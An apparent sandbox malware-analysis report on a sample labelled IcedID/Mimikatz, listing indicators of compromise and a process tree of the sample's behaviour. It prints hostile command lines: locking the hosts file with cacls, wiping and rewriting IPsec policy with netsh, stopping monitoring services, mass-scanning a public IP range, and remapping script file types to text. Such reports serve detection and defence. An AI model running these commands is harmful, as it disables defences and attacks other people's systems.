cmd.execmd.execmd.exexohudmc.execmd.exenetsh.exenet1.exenet.exenetsh.execmd.exebtuizeiim.execmd.exe2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exewpcap.exenetsh.exesc.exenet1.execmd.execacls.exenet1.exenetsh.exenetsh.exenet.exenet1.execmd.execmd.execacls.execmd.exenet1.execmd.exesc.exesc.execmd.execacls.exenet.exeschtasks.execmd.exenet1.exenetsh.exenet.exenet.exenet.execmd.exeschtasks.execmd.execmd.exenet.execmd.exeliuibviiz.execmd.exePING.EXEmgmtcbi.exenet1.execmd.exenetsh.exenetsh.execmd.exenetsh.exeewqksq.execmd.exenetsh.exeschtasks.exenetsh.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language btuizeiim.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language liuibviiz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mgmtcbi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ewqksq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid Process 4676 PING.EXE 2956 cmd.exe -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0008000000023ca2-6.dat nsis_installer_2 behavioral2/files/0x0008000000023cb5-15.dat nsis_installer_1 behavioral2/files/0x0008000000023cb5-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 41 IoCs
Processes:
iyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exemgmtcbi.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mgmtcbi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mgmtcbi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iyibcmiuc.exe -
Modifies registry class 14 IoCs
Processes:
mgmtcbi.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" mgmtcbi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 2632 schtasks.exe 4268 schtasks.exe 2500 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
mgmtcbi.exepid Process 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exepid Process 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exemgmtcbi.exemgmtcbi.exevfshost.exeiyibcmiuc.exeltbtbc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exedescription pid Process Token: SeDebugPrivilege 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4076 mgmtcbi.exe Token: SeDebugPrivilege 428 mgmtcbi.exe Token: SeDebugPrivilege 4200 vfshost.exe Token: SeDebugPrivilege 1092 iyibcmiuc.exe Token: SeLockMemoryPrivilege 392 ltbtbc.exe Token: SeLockMemoryPrivilege 392 ltbtbc.exe Token: SeDebugPrivilege 672 iyibcmiuc.exe Token: SeDebugPrivilege 3600 iyibcmiuc.exe Token: SeDebugPrivilege 4116 iyibcmiuc.exe Token: SeDebugPrivilege 244 iyibcmiuc.exe Token: SeDebugPrivilege 1840 iyibcmiuc.exe Token: SeDebugPrivilege 4844 iyibcmiuc.exe Token: SeDebugPrivilege 4052 iyibcmiuc.exe Token: SeDebugPrivilege 3656 iyibcmiuc.exe Token: SeDebugPrivilege 4928 iyibcmiuc.exe Token: SeDebugPrivilege 2004 iyibcmiuc.exe Token: SeDebugPrivilege 4608 iyibcmiuc.exe Token: SeDebugPrivilege 4336 iyibcmiuc.exe Token: SeDebugPrivilege 1628 iyibcmiuc.exe Token: SeDebugPrivilege 4136 iyibcmiuc.exe Token: SeDebugPrivilege 2064 iyibcmiuc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exemgmtcbi.exemgmtcbi.exexohudmc.exeewqksq.exemgmtcbi.exemgmtcbi.exepid Process 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe 4076 mgmtcbi.exe 4076 mgmtcbi.exe 428 mgmtcbi.exe 428 mgmtcbi.exe 624 xohudmc.exe 2736 ewqksq.exe 3552 mgmtcbi.exe 3552 mgmtcbi.exe 4016 mgmtcbi.exe 4016 mgmtcbi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.execmd.exemgmtcbi.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 3628 wrote to memory of 2956 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe 85 PID 3628 wrote to memory of 2956 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe 85 PID 3628 wrote to memory of 2956 3628 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe 85 PID 2956 wrote to memory of 4676 2956 cmd.exe 88 PID 2956 wrote to memory of 4676 2956 cmd.exe 88 PID 2956 wrote to memory of 4676 2956 cmd.exe 88 PID 2956 wrote to memory of 4076 2956 cmd.exe 89 PID 2956 wrote to memory of 4076 2956 cmd.exe 89 PID 2956 wrote to memory of 4076 2956 cmd.exe 89 PID 428 wrote to memory of 4004 428 mgmtcbi.exe 91 PID 428 wrote to memory of 4004 428 mgmtcbi.exe 91 PID 428 wrote to memory of 4004 428 mgmtcbi.exe 91 PID 4004 wrote to memory of 1728 4004 cmd.exe 93 PID 4004 wrote to memory of 1728 4004 cmd.exe 93 PID 4004 wrote to memory of 1728 4004 cmd.exe 93 PID 4004 wrote to memory of 4692 4004 cmd.exe 94 PID 4004 wrote to memory of 4692 4004 cmd.exe 94 PID 4004 wrote to memory of 4692 4004 cmd.exe 94 PID 4004 wrote to memory of 2896 4004 cmd.exe 95 PID 4004 wrote to memory of 2896 4004 cmd.exe 95 PID 4004 wrote to memory of 2896 4004 cmd.exe 95 PID 4004 wrote to memory of 4144 4004 cmd.exe 96 PID 4004 wrote to memory of 4144 4004 cmd.exe 96 PID 4004 wrote to memory of 4144 4004 cmd.exe 96 PID 4004 wrote to memory of 3172 4004 cmd.exe 97 PID 4004 wrote to memory of 3172 4004 cmd.exe 97 PID 4004 wrote to memory of 3172 4004 cmd.exe 97 PID 4004 wrote to memory of 1436 4004 cmd.exe 98 PID 4004 wrote to memory of 1436 4004 cmd.exe 98 PID 4004 wrote to memory of 1436 4004 cmd.exe 98 PID 428 wrote to memory of 4508 428 mgmtcbi.exe 99 PID 428 wrote to memory of 4508 428 mgmtcbi.exe 99 PID 428 wrote to memory of 4508 428 mgmtcbi.exe 99 PID 428 wrote to memory of 4956 428 mgmtcbi.exe 101 PID 428 wrote to memory of 4956 428 mgmtcbi.exe 101 PID 428 wrote to memory of 4956 428 mgmtcbi.exe 101 PID 428 wrote to memory of 1428 428 mgmtcbi.exe 103 PID 428 wrote to memory of 1428 428 mgmtcbi.exe 103 PID 428 wrote to memory of 1428 428 mgmtcbi.exe 103 PID 428 wrote to memory of 2088 428 mgmtcbi.exe 107 PID 428 wrote to memory of 2088 428 mgmtcbi.exe 107 PID 428 wrote to memory of 2088 428 mgmtcbi.exe 107 PID 2088 wrote to memory of 2344 2088 cmd.exe 109 PID 2088 wrote to memory of 2344 2088 cmd.exe 109 PID 2088 wrote to memory of 2344 2088 cmd.exe 109 PID 2344 wrote to memory of 4016 2344 wpcap.exe 110 PID 2344 wrote to memory of 4016 2344 wpcap.exe 110 PID 2344 wrote to memory of 4016 2344 wpcap.exe 110 PID 4016 wrote to memory of 3128 4016 net.exe 112 PID 4016 wrote to memory of 3128 4016 net.exe 112 PID 4016 wrote to memory of 3128 4016 net.exe 112 PID 2344 wrote to memory of 3788 2344 wpcap.exe 113 PID 2344 wrote to memory of 3788 2344 wpcap.exe 113 PID 2344 wrote to memory of 3788 2344 wpcap.exe 113 PID 3788 wrote to memory of 3136 3788 net.exe 115 PID 3788 wrote to memory of 3136 3788 net.exe 115 PID 3788 wrote to memory of 3136 3788 net.exe 115 PID 2344 wrote to memory of 3288 2344 wpcap.exe 116 PID 2344 wrote to memory of 3288 2344 wpcap.exe 116 PID 2344 wrote to memory of 3288 2344 wpcap.exe 116 PID 3288 wrote to memory of 4992 3288 net.exe 118 PID 3288 wrote to memory of 4992 3288 net.exe 118 PID 3288 wrote to memory of 4992 3288 net.exe 118 PID 2344 wrote to memory of 5100 2344 wpcap.exe 119
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\untipbtiz\ltbtbc.exe"C:\Windows\TEMP\untipbtiz\ltbtbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ybemumnz\mgmtcbi.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4676
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4076
-
-
-
C:\Windows\ybemumnz\mgmtcbi.exeC:\Windows\ybemumnz\mgmtcbi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3172
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1436
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4508
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4956
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1428
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\jhetmctcv\bctzbzczb\wpcap.exeC:\Windows\jhetmctcv\bctzbzczb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3128
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3136
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4992
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:5100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:704
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4712 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4500
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2492 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:5020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2980
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\jhetmctcv\bctzbzczb\Scant.txt2⤵PID:4676
-
